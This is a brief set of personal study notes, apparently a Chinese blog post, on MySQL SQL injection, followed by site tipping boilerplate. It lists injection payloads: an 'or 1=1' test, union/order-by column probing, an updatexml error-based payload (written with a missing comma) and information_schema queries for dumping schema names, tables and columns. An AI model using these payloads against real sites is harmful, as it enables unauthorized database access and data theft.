mysql注入个人学习笔记

整数型字注入:

1.判断数字型还是字符型(加引号)id=‘1’ or ‘1’=‘1’

不是的话单引号不会完全闭合

2.查字段数 union select1,2,3 order by

3.查询数据库 表 字段hackbar-load

 报错注入:

select updatexml(1,concat(0x7e,(select version())0x7e),1)

 布尔盲注

时间盲注

select schema_name from information_schema.schemata

select group_concat(table_name)from information_schema.tables where table_schema='  '

select group_concat(column_name)from information_schema.columns where table_schema='   ' and table_name='   '

(图片来源河北师范大学sourcecode战队)

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值